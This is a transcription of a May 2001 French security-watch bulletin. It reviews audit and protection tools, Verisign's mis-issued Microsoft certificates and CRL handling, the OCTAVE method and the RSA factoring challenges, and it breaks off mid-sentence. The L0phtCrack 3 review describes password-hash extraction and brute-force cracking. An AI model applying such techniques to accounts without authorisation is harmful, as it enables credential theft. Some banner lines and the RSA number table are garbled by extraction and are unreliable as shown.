Veille Technologique Sécurité
Transcription
Veille Technologique Sécurité
APOGEE Communications R dee orrtt d po pp Raap Veille Technologique Sécurité N 4 34 N°°3 Mai 2001 Les informations fournies dans ce document ont été collectées et compilées à partir de sources d'origines diverses et publiquement accessibles : mailing-lists, newsgroups, sites Web, ... Ces informations sont fournies pour ce qu'elles valent sans garantie d'aucune sorte vis à vis de l'exactitude, de la précision ou de la qualité de l'information. Les URL associées à certains thèmes sont validées à la date de la rédaction du document. Les symboles d’avertissement suivants seront éventuellement utilisés: ! " Site dont la consultation est susceptible de générer directement ou indirectement, une attaque sur l’équipement de consultation, voire de faire encourir un risque sur le système d’information associé. Site susceptible d’héberger des informations ou des programmes dont l’utilisation est répréhensible au titre de la Loi Française. Aucune garantie ne peut être apportée sur l'innocuité de ces sites, et en particulier, sur la qualité des applets et autres ressources présentées au navigateur WEB. LLaa ddiiffffuussiioonn ddee ccee ddooccuum meenntt eesstt rreessttrreeiinnttee aauuxx cclliieennttss ddeess sseerrvviicceess V VTTS S--R RA APPPPO OR RTT eett V VTTS S__EEN NTTR REEPPR RIIS SEE Les marques et les produits cités dans ce rapport sont la propriété des dépositaires respectifs. APOGEE Communications 1, Rue Jean Rostand 91893 ORSAY CEDEX Pour tous renseignements Offre de veille: http://www.apogee-com.fr/veille Informations: [email protected] © APOGEE Communications - Tous droits réservés Mai 2001 Au sommaire de ce rapport … PRODUITS ET TECHNOLOGIES LES PRODUITS 5 5 AUDIT 5 POLIVEC™ SCANNER L0PHTCRACK 3 5 6 SÉCURISATION 7 ANTISNOOP ERASER LES TECHNOLOGIES 7 8 9 PKI 9 DE LA BONNE GESTION DES LISTES DE RÉVOCATION INFORMATIONS ET LÉGISLATION LES INFORMATIONS AUDIT 11 11 11 PROFILS DE MENACE 'OCTAVE'™ CRYPTOGRAPHIE REPRISE DES DÉFIS RSA LA 9 LÉGISLATION SURVEILLANCE ECHELON 11 12 12 13 13 13 LOGICIELS LIBRES LES SERVICES DE BASE LES OUTILS 14 14 14 NORMES ET STANDARDS LES PUBLICATIONS DE L'IETF 16 16 LES LES RFC DRAFTS NOS COMMENTAIRES LES RFC RFC 3089 LES DRAFTS DRAFT-FLOYD-TCP-RESET-00 ALERTES ET ATTAQUES ALERTES GUIDE DE LECTURE FORMAT DE LA PRÉSENTATION SYNTHÈSE MENSUELLE AVIS OFFICIELS BUGZILLA CERT CIAC CISCO FREEBSD HP INNFEED IPSWITCH KERBEROS LINUX LINUX DEBIAN LINUX MANDRAKE LINUX REDHAT LINUX SUSE MICROSOFT NETSCAPE NIPC ORACLE ROBTEX SGI SUN Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés 16 16 21 21 21 22 22 23 23 23 24 24 25 25 25 25 25 26 26 26 26 27 27 27 27 27 27 28 29 29 29 29 29 29 Page 2/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 SYMANTEC EEYE 30 30 ALERTES NON CONFIRMÉES 3COM ALADDIN CISCO CMAIL MCAFEE MICROSOFT NOVELL VMWARE 30 30 30 30 30 31 31 31 31 AUTRES INFORMATIONS 31 REPRISES D'AVIS 31 ET CORRECTIFS ALLAIRE AUSCERT CERT CIAC COMPAQ FREEBSD LINUX DEBIAN LINUX MANDRAKE LINUX REDHAT MICROSOFT OPENBSD OPENSSL SAMBA 31 32 32 32 34 34 34 34 35 35 35 35 36 CODES D'EXPLOITATION 36 BULLETINS ET NOTES 36 ALCATEL HYLAFAX MICROSOFT ATTAQUES AUSCERT AXENT/SYMANTEC CERT CISCO COMPAQ ECOMMERCE HP ISS ISS/NETWORKICE NIPC SANS SYMANTEC/AXENT VIRUS ATTAQUES OUTILS HELLKIT ! MAGIC STRING PIMP ! TECHNIQUES MANIPULATION D’URL Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés 36 36 36 36 37 37 37 38 38 38 38 38 38 38 39 39 39 39 39 39 41 43 43 Page 3/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 Le mot de la rédaction … Une fois n’est pas coutume, nous ne commenterons pas le défi ‘HoneyNet’ du mois de Mai, défi fort intéressant mais bien trop difficile à traiter dans un rapport de veille. Il s’agissait en effet de retrouver les traces d’une attaque utilisant un ‘rootkit’ ayant été ensuite éliminé du système. Tâche difficile mais oh combien instructive, d’autant que, pour seul indice est fournie l’image de la partition racine du système LINUX compromis soit 13Mo de données… Mois de Mai, mois du renouveau marqué par les nombreuses mises à jour de produits libres, dont ‘apache’ et ‘bind’, qui conduiront certainement l’exploitant à engager une campagne d’inventaire et d’upgrade. L'équipe de Veille Technologique Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés Page 4/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 PR RO EC OD CH DU HN UIIT NO OL TS LO SE OG GIIE ET T TE ES S LES PRODUITS AUDIT POLIVEC™ SCANNER # Description PoliVec™ Scanner est le premier logiciel disponible d’une famille de produits de sécurité édités par la société américaine ‘e-business technology‘. Trois produits devraient composer à terme cet environnement: PoliVec Scanner, PoliVec Builder, PoliVec Enforcer. Notons qu’aucune information n’est disponible concernant l’infrastructure générale et les fonctionnalités associées aux deux derniers produits en dehors de la présentation laconique de la gamme PoliVec™: PoliVec™ is a suite of innovative policy-driven security products designed to specifically address the issue of enterprise security management and control. Using patent pending binary vector technology, PoliVec supports the definition, implementation and proactive monitoring of a comprehensive security policy across the entire enterprise architecture. Une version de démonstration du produit PoliVec™ Scanner, valable pour une durée de 30 jours, est proposée sur le site de l’éditeur sous la forme d’un paquetage de 14Mo. Cette offre permet d’obtenir une bonne idée de la capacité de ce produit positionné en tant qu’outil d’aide à l’administration de la sécurité en environnement Windows. Dans ce domaine, les fonctions d’acquisition des paramètres de sécurité et de gestion des configurations associées doivent être considérées comme fondamentales. Sans elles, aucun suivi du niveau de sécurité du système d’information ne peut être effectué. PoliVec™ Scanner intervient à ce niveau en offrant, sur la base d’un modèle distribué ‘console/agents‘, l’ensemble des fonctions d’acquisition, d’analyse et de reporting permettant d’obtenir en temps quasi-réel un état des lieux d’un parc de postes NT et Windows 2000. Après avoir activé le produit, l’utilisateur se voit proposer deux choix : 1. Recharger les données correspondant à un audit effectué précédemment et enregistrées sous le nom du système audité. 2. Engager un nouvel audit, étant entendu que l’utilisateur dispose des éléments d’authentification nécessaires sur les systèmes cibles : identifiant et mot de passe d’un compte privilégié sur un système autonome ou privilèges sur le domaine d’appartenance du poste cible. Dans le second cas, l’utilisateur obtiendra la liste des systèmes NT et W2K présents sur le réseau ou déclarés dans un domaine puis sélectionnera la cible de l’audit dans liste proposée. L’audit pourra être initialisé après établissement d’une session authentifiée ou anonyme (Null Session). Attention, ce dernier mode ne permet pas d’acquérir toutes les informations susceptibles d’être obtenue en mode authentifié. Les résultats pourront être visualisés, et imprimés sous la forme d’un rapport mis en page (notons que la version de démonstration (PoliVec 1.0) semble être entachée d’un défaut provoquant une erreur lors de la génération du rapport). PoliVec™ Scanner assure la collecte et l’analyse des informations suivantes : 1. Partages réseaux 2. Configuration des comptes utilisateurs 3. Configuration des groupes 4. Configuration système 5. Contenu de la registry 6. Etat des services Bien qu’il soit difficile de juger de l’intérêt d’un produit d’administration dans un contexte aussi restrictif que celui du test d’une version de démonstration, PoliVec Scanner apparaît être un produit dont l’ergonomie de l’interface laisse Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés Page 5/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 envisager qu’il puisse être d’un grand secours dans un environnement Mixte Windows ™ NT/ Windows 2000. Notons cependant l’existence d’autres produits offrant des fonctions similaires dont notamment ceux proposés par la société SystemTools (ex Adkins): DumpSec (utilitaire gratuit écrit par SomarSoft) et Hyena V3 (la version 2.3 est présentée dans notre rapport de veille N°21 d’avril 2000). Attention, l’installation du produit en mode démonstration copie, et active sans informer l’utilisateur, un service de gestion de clefs de licence, ‘CryptKey’, qui reste actif après désinstallation du produit … # Complément d'information https://www.polivec.com/scanner/ L0PHTCRACK 3 # Description Une nouvelle version du célèbre outil l0phtCrack est désormais disponible. Bien que distribué à l’origine en tant qu’utilitaire libre de tous droits, la stratégie de distribution et de licence mise en place depuis la version LC2 (Rapport de veille N°2 Février 1998) fait de L0phtCrack un véritable produit de sécurité. Désormais destiné à analyser la qualité de la politique de gestion des mots de passe, l0phtCrack reste cependant un outil susceptible d’être utilisé à des fins malveillantes… La version 3, dite LC3, est livré par la société d’édition de logiciels ‘Security Software Technology’ (ou SST) qui détient depuis Janvier les droits de distribution des produits développés par le groupe l0pht (l0phtCrack et AntiSniff) avant sa fusion avec la société @stake. Notons à ce sujet que SST détient aussi les droits de distribution du produit d’audit CIS (Cerberus Internet Scanner) – ex. NtInfoScan - précédemment édité par la société Anglaise Cerberus Infosec. Cette société a elle-même été rachetée en Juillet 2000 par @stake dont les ambitions dans le domaine de l’audit de sécurité semblent se confirmer. Livrée sous la forme d’un paquetage d’installation de 4.6Mo, la version LC3 est désormais compatible Windows 2000. Elle intègre par ailleurs de nombreuses fonctionnalités d’acquisition précédemment accessibles sous la forme d’utilitaires indépendants. Un mode d’évaluation sur une période limitée à 15 jours autorise l’accès à toutes les fonctions à l’exception de l’attaque en force des mots de passe. La version complète est accessible au prix de $249 l’unité ou de $1999 pour 10 licences. Les nouvelles fonctionnalités de la version LC3 sont les suivantes : • Support Windows 2000™ : LC3 peut extraire les informations relatives aux comptes (condensés chiffrés des mots de passe) par extraction directe depuis l’annuaire même si celui-ci est protégé par le mécanisme SYSKEY. La fonction d’acquisition par écoute des conversations réseaux, présente dans la version LC2, a été mise à jour pour gérer les nouveaux formats utilisés par W2K. • Aide à la configuration : une aide interactive permet de rapidement configurer le produit : source de donnée, méthode d’attaque et présentation des résultats. L’utilisateur notera que les écrans d’accueil du produit font référence à la méthode d’audit (‘Auditing method’) lorsqu’il s’agit de sélectionner la stratégie d’attaque du mot de passe … • Analyse distribuée : l’attaque en force des mots de passe est d’autant plus efficace que la puissance de calcul disponible est grande. LC3 autorise la distribution du calcul sur plusieurs machines permettant ainsi de réduire le temps de recouvrement des mots de passe. • Dictionnaire étendu : un dictionnaire de 250 000 mots – anglais – est fourni avec cette version. Notons à ce propos que la gestion des caractères étendus (dont les accentués) n’est toujours pas intégrée au produit. Ainsi, et à titre d’exemple, le mot de passe d’un compte dénommé ‘élevé’ ne sera trouvé ni par attaque en force, ni par attaque sur un dictionnaire contenant ce mot, ni même par analyse de trivialité lorsque le mot de passe est identique au nom du compte ! • Formats d’import : plusieurs nouveaux formats d’import sont proposés permettant d’assurer une analyse en temps différé sur un système tiers. • Présentation améliorée : il est désormais possible d’enlever un mot de passe de la liste des mots de passe à analyser via l’interface graphique. Par ailleurs, l’utilisateur peut choisir de ne pas afficher le mot de passe en clair si celui-ci est découvert. La version LC3 n’aura qu’un intérêt limité dans un environnement utilisant (ou imposant l’utilisation) des jeux de caractères étendus. Par ailleurs, force est de constater que les fonctionnalités qui permettraient de considérer LC3 Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés Page 6/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 comme un véritable outil d’administration n’ont toujours pas été intégrées: - notification de l’utilisateur dont le mot de passe a été découvert, - possibilité de verrouiller conditionnellement les comptes pour lesquels le mot de passe est trivial, … Cela est d’autant plus surprenant lorsque l’on sait que ces fonctionnalités ont été intégrées dés la première version d’un utilitaire similaire mais adapté au monde UNIX : Crack V5 d’Alec Muffet. Attention, la procédure d’installation du paquetage testé présente un défaut: le module WinpCap permettant l’acquisition des informations sur le réseau n’est pas installé conduisant à une erreur d’exécution de LC3 lors de son chargement. Il est nécessaire d’installer manuellement ce module au moyen de l’utilitaire Setup.exe présent dans le sous-répertoire WinPCap localisé sous le répertoire temporaire d’extraction de LC3. # Complément d’information http://www.securitysoftwaretech.com/lc3/ SECURISATION ANTISNOOP # Description L’utilitaire ‘AntiSnoop’, accessible en ShareWare moyennant $20, est présenté comme une solution de protection contre le vol des mots de passe et autres codes secrets devant être saisis au clavier d’un poste Windows. De nombreux utilitaires sont en effet disponibles qui permettent l’enregistrement et la restitution ultérieure de tout ou partie des séquences de touches saisies par l’utilisateur, dont bien évidemment les mots de passe des applications protégées. Notons à ce propos que l’installation de ces enregistreurs est généralement effectuée par le biais d’un code mobile spécifique ou d’un cheval de Troie. Le concept proposé est astucieux puisqu’il vise à limiter toute saisie au clavier en utilisant de manière intensive la souris ainsi que le mécanisme du copier/coller, et par conséquent, le presse-papier. Ainsi, la saisie d’une donnée sensible ne pourra plus être journalisée par les enregistreurs s’installant autour du gestionnaire de clavier et ne journalisant pas les échanges effectués par le biais du presse-papier. Le fonctionnement d’AntiSnoop est simple : L’utilisateur sélectionne tout d’abord le mot de passe maître nécessaire pour déverrouiller l’accès aux identifiants gérés par AntiSnoop. Ce mot de passe est saisi par l’intermédiaire de la souris en sélectionnant les caractères le composant sur une rangée de boutons. L’organisation de ces boutons et la liste des caractères proposée est modifiée à chaque initialisation du logiciel pour défier toute tentative d’analyse par un mécanisme de journalisation des évènements graphiques. Les identifiants sont ensuite inscrits en saisissant un nom de référence (alias) puis le code à stocker. Ces informations seront enregistrées après avoir été chiffrées au moyen de l’algorithme Blowfish développé par B.Schneier. Ces opérations d’initialisation effectuées, l’utilisateur pourra à tout instant activer AntiSnoop installé dans la barre d’outil. Après avoir saisi le mot de passe maître à l’aide de la souris, l’utilisateur se verra proposer la liste des noms de référence et des codes associés. Notons que cette liste peut être masquée par une simple action sur le bouton ‘Hide‘ L’utilisateur sélectionnera ensuite le code souhaité et copiera celui-ci dans le presse papier au moyen d’un clic sur le bouton ‘Copy’. L’opération inverse sera effectuée en copiant le contenu du presse papier dans la zone de saisie du code présentée par l’application cible. Fourni avec une excellente aide en ligne, cet utilitaire se substituera sans difficulté à d’autres produits similaires mais n’assurant qu’un archivage des codes dans une base chiffrée. # Complément d'information http://32-bitfreeware.virtualave.net Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés Page 7/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 ERASER # Description Eraser est l’un de ces outils dont on pourrait, a priori, considérer qu’il n’intéressera que le plus paranoïaque des utilisateurs d’un système informatique. Il s’agit en effet de l’une de ces nombreuses versions électroniques du broyeur mécanique de documents destiné à faire disparaître toute trace lisible d’un document sensible. L’obligation d’effacer une donnée après utilisation, que celle-ci soit localisée dans un fichier ou dans une zone mémoire, apparaît dans l’un des ouvrages de la célèbre collection éditée par le DoD et connu sous le terme ‘RainBow’ : le livre Orange. Un système devant être certifié au niveau C2 doit en effet garantir l’effacement des données avant réutilisation de la ressource. En réalité, cette exigence fait partie intégrante d’une stratégie de nettoyage (sanitizing) visant à éviter la compromission des données ayant fait l’objet d’un stockage en prenant en compte le cycle de vie du support de stockage: de l’initialisation à la destruction. Le domaine de la récupération des données numériques sur supports magnétiques étant considéré comme sensible, les techniques et mécanismes utilisés sont longtemps restés confidentiels. Les rares informations circulant au sujet de la possible récupération de données effacées (au sens magnétique) étaient considérées comme rumeurs infondées. En 1996 lors d’une conférence USENIX Peter Gutmann, un spécialiste de la sécurité, fait sensation en dévoilant au grand public différentes techniques permettant de révéler ‘couche par couche’ les données enregistrées sur un support magnétique. Ces techniques avaient pourtant fait l’objet dès 1985 de publications restées, semble-t-il, confidentielles. Depuis, les outils de nettoyage et d’effacement de sécurité fleurissent: un article comparatif mis à jour l’année dernière (Mai 2000) ne recense pas moins de 27 outils similaires en environnement Windows ! Ecrit par un étudiant Finlandais, Sami Tolvanen, Eraser se distingue non seulement par les fonctionnalités proposées mais aussi par le choix d’un mode de distribution sous licence GPL offrant un accès gratuit au programme mais aussi aux sources de celui-ci. Un quelconque programme tiers pourra bénéficier des fonctions techniques proposées, celles-ci étant regroupées dans une librairie dynamique dont les interfaces sont parfaitement documentées. La version Eraser 5.01 fonctionne en environnement Windows ™ 95, 98, ME, NT 4.0 et 2000. L’effacement d’un fichier peut être initialisé directement depuis l’explorateur de fichier après sélection de la cible ou depuis une interface de commande spécifique. Dans tous les cas, l’utilisateur est libre de sélectionner, dans une liste de méthodes prédéfinies, la méthode d’effacement devant être appliquée. Trois méthodes sont proposées par défaut : 1. Méthode ‘Gutman’ en référence à la technique suggérée par Peter Gutman dans l’article cité précédemment, 2. Méthode ‘Dod 5220.22-M’ conforme aux dispositions décrites dans le chapitre 8-306 du manuel NISPOM (‘National Industrial Security Program Operation Manual’), 3. Méthode ‘Aléatoire’ consistant à remplir la zone occupée par le fichier avec une série de données aléatoires. L’utilisateur peut créer sa propre méthode d’effacement en définissant celle-ci sous la forme d’une succession, ordonnée ou aléatoire, d’effacements élémentaires : écriture aléatoire ou écriture d’un motif configurable de 3 octets au plus. L’interface de commande spécifique autorise la définition de travaux d’effacement ‘à la demande’ ou ‘planifiés’ permettant ainsi de réduire l’impact du traitement sur les performances générales du poste. Cet utilitaire, performant et ergonomique, répondra parfaitement aux besoins des utilisateurs désireux d’éliminer toute trace résiduelle d’un document électronique sur le poste de travail. Comme souvent dans le domaine de l’investigation sur support électronique, l’efficacité de la technique mise en œuvre ne pourra être garantie à 100%, les technologies d’analyse n’étant certainement pas toutes divulguées. La disponibilité des sources est un atout face aux produits commerciaux concurrents permettant à tout un chacun de se faire une opinion sur la qualité de l’implémentation et, éventuellement, de vérifier l’absence de fonctions non documentées. # Complément d'information http://www.tolvanen.com/eraser/ http://www.dss.mil/isec/nispom.htm http://www.usenix.org/publications/library/proceedings/sec96/full_papers/gutmann/ Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés Page 8/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 LES TECHNOLOGIES PKI DE LA BONNE GESTION DES LISTES DE REVOCATION # Description Le 22 Mars 2001, l’autorité de certification commerciale Verisign annonçait avoir délivré fin Janvier 2001 deux certificats de type ‘Classe 3 Commercial Software Publisher’ à une personne se faisant passer pour un employé de Microsoft. Cette catégorie de certificat est principalement destinée à signer les codes mobiles et autres objets produits par une entité commerciale assurant l’édition de logiciels, la classe ‘Individual Software Publishers’ étant elle réservée aux concepteurs individuels de logiciel. Conséquence de cette ‘erreur’, le possesseur des clefs privées associées aux deux certificats peut signer, et diffuser, n’importe quelle composante logicielle en se faisant passer pour ‘Microsoft Corporation’ durant toute la période de validité de ces deux certificats sauf anticiper en révoquant ceux-ci. Etonnamment, cette dernière solution est à l’origine d’une véritable polémique concernant non pas l’origine de l’erreur mais la capacité des produits à gérer cette opération pourtant toute simple consistant en l’inscription des certificats incriminés dans une liste appelée ‘Liste de révocation’ (ou CRL) accessible à tous. A tous oui, mais sous réserve de connaître le chemin d’accès à cette liste ! Une excellente analyse de la prise de position des deux partis - Verisign et Microsoft - a été publiée sur le site amug.org et reprise par B.Schneier dans sa lettre mensuelle. Sans rentrer dans le détail, le lecteur se reportera à l’analyse précitée, nous proposons une brève synthèse des différents éléments du dossier. Le problème soulevé est celui de l’ambiguïté de la position de Microsoft qui, d’une part annonce la disponibilité d’un correctif – MS01-017 - destiné à rejeter les certificats usurpés, et d’autre part, affirme que Windows supporte le mécanisme des listes de révocations (CRL) depuis 1998 pour NT et 1999 pour la famille Windows9x. Pourquoi diffuser un correctif si le mécanisme de révocation est fonctionnel ! Le document de référence applicable en la matière est le RFC2459 ‘Internet X.509 Public Key Infrastructure Certificate and CRL Profile’ qui décrit en détail la structure d’un certificat X509.v3 utilisable dans le contexte de l’Internet. Ce RFC détaille par ailleurs le mécanisme de révocation basé sur le contrôle de la non inscription du certificat dans une liste de révocation. A ce jour, quatre mécanismes d’acquisition de ces listes de révocation sont couramment employés : 1. Méthode manuelle : l’utilisateur télécharge une liste de révocation à partir d’une URL réputée fiable et sauvegarde celle-ci en un lieu où elle pourra être exploitée. Bien entendu, cette méthode est une source potentielle d’erreur car imposant une synchronisation manuelle. 2. Méthode de l’URL connue : chaque Autorité de Certification publie sur son site la liste de révocation correspondant à son autorité. Lorsqu’une vérification ou mise à jour s’avère nécessaire, le téléchargement de dernière version de la liste peut rapidement être effectué par l’utilisateur. 3. Méthode de l’URL certifiée : la localisation de la liste de révocation est inscrite dans l’un des attributs étendus du certificat racine de l’autorité de certification. Cette méthode offre un double avantage en autorisant l’automatisation du téléchargement de la liste de révocation depuis une localisation certifiée. 4. Méthode RFC2459 : cette méthode est similaire à la précédente mais la localisation de la liste de révocation est inscrite dans chacun des certificats émois simplifiant encore le processus d’automatisation de la mise à jour de cette liste. La position de Microsoft est plus facilement admissible en ayant connaissance des éléments suivants : # Le mécanisme central de contrôle des certificats – CryptoAPI – est conforme aux recommandations du RFC2459. Ainsi, lorsqu’un certificat contenant un CDP (CRL Distribution Point) est présenté, la liste de révocation est automatiquement mise à jour, sous réserve toutefois que les options correspondantes (‘Check for server certificate revocation’ et ‘Check for publisher’s certificate revocation’) aient été activées, ce qui n’est pas le cas par défaut ! # Ce mécanisme n’offre aucune interface officielle permettant de configurer l’utilisation d’une liste de révocation locale ou d’une URL connue. # Les certificats émis par Verisign ne contiennent pas l’attribut étendu CDP. Dés lors, le moyen permettant de révoquer à coup sûr les deux certificats sans remettre en cause l’implémentation courante de la CryptoAPI est l’application d’un correctif purement ‘palliatif’ … Notons cependant que bien que la parade utilisée ne soit pas documentée, le correctif contient deux fichiers - une librairie dénommée ‘mscrlrev.dll’ ainsi qu’un fichier dénommé ‘verisignpub1.crl’ - qui sont simplement copiés sous le répertoire ‘%systemroot%\system32’. La visualisation du contenu du fichier ‘verisignpub1.crl’ confirme qu’il s’agit d’une CRL en bonne et due forme. Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés Page 9/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 Disposerait-on enfin, après application de ce correctif, d’un moyen permettant de déclarer une quelconque liste de révocation par simple transfert de celle-ci dans le répertoire ‘%systemroot%\system32’ ? # Complément d’information http://amug.org/~glguerin/opinion/revocation.html http://www.microsoft.com/technet/security/bulletin/MS01-017.asp http://www.verisign.com/developer/notice/authenticode/index.html Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés Page 10/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 IN NF EG FO GIIS OR RM SL MA LA AT AT TIIO TIIO ON ON NS N SE ET T LE LES INFORMATIONS AUDIT PROFILS DE MENACE 'OCTAVE'™ # Description La méthodologie d'évaluation des risques Octave™ (Operationally Critical Threat, Asset, and Vulnerability Evaluation) a été développée par l'université de Carnegie Mellon (CMU). Passée inaperçue à l'origine bien que détaillée en 1999 dans le rapport technique SEI-99-TR-017, la méthodologie Octave™ est désormais soutenue par le CERT-CC qui lui consacre un effort de promotion et de développement conséquent. Rappelons que cette méthodologie s'appuie sur une démarche organisée en trois phases, phases elles-mêmes décomposées en 8 tâches: 1. Inventaire des actifs et identification des menaces (Build Asset-Based Threat Profiles*) La perception des besoins en terme de sécurité est collectée auprès des personnels appartenant à trois niveaux d'organisation de l'entreprise en ciblant les thèmes de l'inventaire des actifs clefs, de la valeur de ceux-ci, des menaces potentielles, des niveaux de risque admissibles et de la stratégie de protection mise en œuvre. Quatre tâches sont engagées: P1 - Identification de la perception des besoins par les cadres dirigeants P2 - Identification de la perception des besoins par les cadres opérationnels P3 - Identification de la perception des besoins par les autres personnels P4 - Etablissement de la synthèse des besoins 2. Evaluation de l'infrastructure sur la base des actifs clefs (Identifiy Infrastructure Vulnerabilities) Les résultats de la phase précédente permettent d'identifier les composants supportant les actifs considérés comme les plus importants. Une analyse de vulnérabilité est ensuite engagée sur tout ou partie de l'infrastructure portant ces composants. P5 - Cartographie de l'infrastructure du SI en vu d'identifier la localisation des actifs, les chemins d'accès et flux de données associés P6 - Evaluation de la vulnérabilité de l'infrastructure 3. Détermination de la stratégie de gestion des risques (Determine Security Risk Management Strategy) La stratégie de gestion des risques est déterminée en tenant compte d'une analyse s'appuyant sur différents scénarios d'intrusion. La stratégie de protection peut alors être établie. P7 - Analyse de risque multidimensionnelle P8 - Développement d'un stratégie de protection Dans sa forme actuelle, Octave doit être considéré comme un cadre de travail proposant une démarche pertinente mais nécessitant cependant la mise à disposition de documents complémentaires pour pouvoir être appliquée avec efficacité. Ainsi, la phase initiale visant à établir les besoins de sécurité par le biais d'une évaluation organisationnelle ne peut être menée sans disposer d'une définition fiable et structurée des éléments méthodologiques manipulés: actifs (asset), menace (threat), risque (risk), atteinte (outcome) … Ainsi, un premier document complémentaire de la méthodologie Octave intitulé 'Octave™ Threat Profiles' publié par le département SEI de l'Université de Carnegie Mellon propose un modèle de description d'une menace. Quatre catégories de menace sont prises en compte: a) Les acteurs humains utilisant un accès réseau b) Les acteurs humains utilisant un accès physique c) Les problèmes systèmes d) Les autres problèmes Un profil décrivant une menace est alors être établi pour chacune de ces quatre catégories à partir d'un modèle générique élémentaire défini sous la forme d'un arbre constitué d'au plus cinq niveaux: Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés Page 11/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 Les attributs 'Accès' et 'Cause' ACTIF ACCES ACTEUR CAUSE CONSEQUENCE sont optionnels et ne sont utilisés asset access actor motive outcome que dans le cadre des catégories de menaces ayant pour origine Divulgation directe un être humain. Ce modèle Modification peut, bien entendu, être adapté Perte / Destruction pour tenir compte de contextes Interruption spécifiques. Notons que le CERT CC annonce la mise à disposition cet été d'un guide d'implémentation de la méthode Octave. * L'intitulé de la phase 1 utilisé dans les présentations effectuées par le CERT (Build Asset-Based Threat Profiles) diffère de celui présent dans le rapport technique du SEI (Build Enterprise-Wide Security Requirements). L'intitulé retenu par le CERT à pour mérite d'être plus directif. # Complément d’information http://www.sei.cmu.edu/publications/documents/99.reports/99tr017/99tr017abstract.html http://www.cert.org/archive/pdf/OCTAVEthreatProfiles.pdf CRYPTOGRAPHIE REPRISE DES DEFIS RSA # Description En 1991, la société RSA Security lançait à la communauté des cryptanalystes une série de 41 défis intitulés ‘RSA Factoring challenge‘ dont l’objectif consistait en la factorisation – réduction sous la forme des deux facteurs premiers - de nombres dont la longueur s’échelonnait de 100 à 500 chiffres par pas de 10 chiffres. Quatre de ces défis ont été remportés dont RSA-129, RSA-130, RSA-140 (terminé le 2/02/1999) et RSA-155 (terminé le 22/08/1999). Dans le même temps deux autres séries de défis voyaient le jour : - la série de défis ‘RSA Secret Key Challenge’ visant à recouvrer le texte original à partir du chiffré produit à l’aide des algorithmes DES (un challenge remporté en Juin 1997) et RC5 ( douze challenges dont seuls trois ont été remportés la même année). - une série de trois défis intitulés ‘DES Challenge’ ayant le même objectif mais dédiés à l’algorithme DES. Le dernier de ces défis, ‘DES III Challenge’ , a été remporté le 19 Janvier 1999. Depuis 2 ans, un calme plat s’est installé: aucun des défis ‘RSA Factoring Challenge’ restant n’a été tenté. Plusieurs raisons pouvent expliquer ce désistement dont principalement une taille devenu trop petite pour être représentative d’une avancée significative et probablement l’absence de dotations encourageantes. En conséquence, RSA Security a annoncé mi-Mai la reprise de la série de défis ‘RSA Factoring challenge’ sous une nouvelle forme en offrant une dotation qui va de $10 000 à $200 000. Huit nouveaux défis sont donc désormais officiellement ouverts. Il est à noter que le nom du défi exprime désormais la taille du nombre devant être factorisé en bits et non plus en digits (chiffres décimaux): Défi Prix Digits Nombre à factoriser 1881988129206079638386972394616504398071635633794173827007633564229888597152346654 RSA-576 $ 10 000 174 RSA-640 $ 20 000 193 RSA-704 $ 30 000 212 RSA-768 $ 50 000 232 RSA-896 $ 75 000 270 RSA-1024 $100 000 309 RSA-1536 $150 000 463 RSA-2048 $200 000 617 8531906060650474304531738801130339671619969232120573403187955065699622130516875930 7650257059 3107418240490043721350750035888567930037346022842727545720161948823206440518081504 5563468296717232867824379162728380334154710731085019195485290073377248227835257423 86454014691736602477652346609 7403756347956171282804679609742957314259318888923128908493623263897276503402826627 6891996419625117843995894330502127585370118968098286733173273108930900552505116877 063299072396380786710086096962537934650563796359 1230186684530117755130494958384962720772853569595334792197322452151726400507263657 5187452021997864693899564749427740638459251925573263034537315482685079170261221429 13461670429214311602221240479274737794080665351419597459856902143413 4120234369866595438555313653325759481798116998443279828454556264338764455652484261 9809887042316184187926142024718886949256093177637503342113098239748515094490910691 0269861031862704114880866970564902903653658867433731720813104105190864254793282601 391257624033946373269391 1350664108659952233496032162788059699388814756056670275244851438515265106048595338 3394028715057190944179820728216447155137368041970396419174304649658927425623934102 0864383202110372958725762358509643110564073501508187510676594629205563685529475213 500852879416377328533906109750544334999811150056977236890927563 1847699703211741474306835620200164403018549338663410171471785774910651696711161249 8593376843054357445856160615445717940522297177325246609606469460712496237204420222 6975675668737842756238950876467844093328515749657884341508847552829818672645133986 3364931908084671990431874381283363502795470282653297802934916155811881049844908319 5450098483937752272570525785919449938700736957556884369338127796130892303925696952 53261620823676490316036551371447913932347169566988069 2519590847565789349402718324004839857142928212620403202777713783604366202070759555 6264018525880784406918290641249515082189298559149176184502808489120072844992687392 8072877767359714183472702618963750149718246911650776133798590957000973304597488084 2840179742910064245869181719511874612151517265463228221686998754918242243363725908 5141865462043576798423387184774447920739934236584823824281198163815010674810451660 3773060562016196762561338441436038339044149526344321901146575444541784240209246165 1572335077870774981712577246796292638635637328991215483143816789988504044536402352 7381951378636564391212010397122822120720357 Si l’un de ces défis tente le lecteur, rappelons que le défi RSA-155 (512bits), donc ‘proche’ du défi RSA-576, n’avait demandé que 7,4 mois calendaire 